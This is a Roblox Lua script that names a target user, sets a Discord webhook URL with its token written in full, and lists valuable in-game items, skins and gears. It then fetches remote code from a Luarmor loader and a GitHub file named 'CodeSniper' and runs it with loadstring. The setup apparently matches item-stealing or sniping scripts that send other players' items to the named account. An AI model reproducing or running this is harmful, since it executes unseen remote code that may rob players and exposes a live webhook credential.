getgenv().TARGET_USER = "Gghi_50"
getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1498772946020204617/K7nfNTthr7QWUY-c8Oy6r7PF62FETJVHp01E_OuXupNfuiat4RXiN2hLsKMtrBl2fpoP"
getgenv().NORMAL_BRAINROTS = {
    ["Garama and Madundung"] = true,
    ["Capitano Moby"] = true,
    ["Burguro And Fryuro"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Spooky and Pumpky"] = true,
    ["La Casa Boo"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Dragon Gingerini"] = true,
    ["La Supreme Combinasion"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["La Secret Combinasion"] = true,
    ["La Food Combinasion"] = true,
    ["Rosey and Teddy"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Strawberry Elephant"] = true,
    ["Skibidi Toilet"] = true,
    ["Meowl"] = true,
    ["Griffin"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Festive 67"] = true,
    ["Antonio"] = true,
    ["Arcadragon"] = true,
    ["Boppin Bunny"] = true,
    ["Bunny and Eggy"] = true,
    ["Caylusaurus"] = true,
    ["Cash or Card"] = true,
    ["Celestial Pegasus"] = true,
    ["Cloverat Clapat"] = true,
    ["Coco and Mango"] = true,
    ["Digi Narwhal"] = true,
    ["Dragon Aquanini"] = true,
    ["Dug dug dug"] = true,
    ["Duggy Bros"] = true,
    ["Elefanto Frigo"] = true,
    ["Fishino Clownino"] = true,
    ["Foxini Lanternini"] = true,
    ["Fortunu and Cashuru"] = true,
    ["Globa Steppa"] = true,
    ["Gym Bros"] = true,
    ["Hopilikalika Hopilikalako"] = true,
    ["Hydra Bunny"] = true,
    ["Jelly Moby"] = true,
    ["Kalika Bros"] = true,
    ["Kraken"] = true,
    ["La Anniversary Grande"] = true,
    ["La Easter Grande"] = true,
    ["La Summer Grande"] = true,
    ["Los Hackers"] = true,
    ["Los Fruits"] = true,
    ["Los Mariachis"] = true,
    ["Money Money Bros"] = true,
    ["Pancake and Syrup"] = true,
    ["Quackini Snackini"] = true,
    ["Rubrikiko"] = true,
    ["Sammyni Cakini"] = true,
    ["Sammyni Fattini"] = true,
    ["Signore Carapace"] = true,
    ["Steakini Fattini"] = true,
    ["Venuspino"] = true,
    ["Capitano Americano"] = true,
    ["Moby Bros"] = true,
    ["Los Admins"] = true,
    ["Tirilikalika Tirilikalako"] = true
}
getgenv().NORMAL_BASE_SKINS = {
    ["Rose"] = true,
    ["Gingerbread"] = true,
    ["Halloween"] = true,
    ["Christmas"] = true,
    ["Bunny Basket"] = true,
    ["Summer"] = true,
    ["Pot of Gold"] = true,
    ["Taco"] = true,
    ["Octo"] = true,
    ["Valentines"] = true,
    ["Lucky"] = true,
    ["Easter"] = true,
    ["Aquatic"] = true
}
getgenv().NORMAL_GEARS = {
    ["Santa's Sleigh"] = true,
    ["Cupid's Wings"] = true,
    ["Witch's Broom"] = true,
    ["Waverider"] = true,
    ["Bloodmoon Slap"] = true,
    ["Bloodmoon Hammer"] = true,
    ["Rainbow Hammer"] = true,
    ["Radioactive Airstrike"] = true,
    ["Demon's Head"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/c5a067c93477b930cc4602547c6d5ffe.lua",true))()
end)
task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/CratosHub-Dev/Gamma/refs/heads/main/CodeSniper"))()
end)
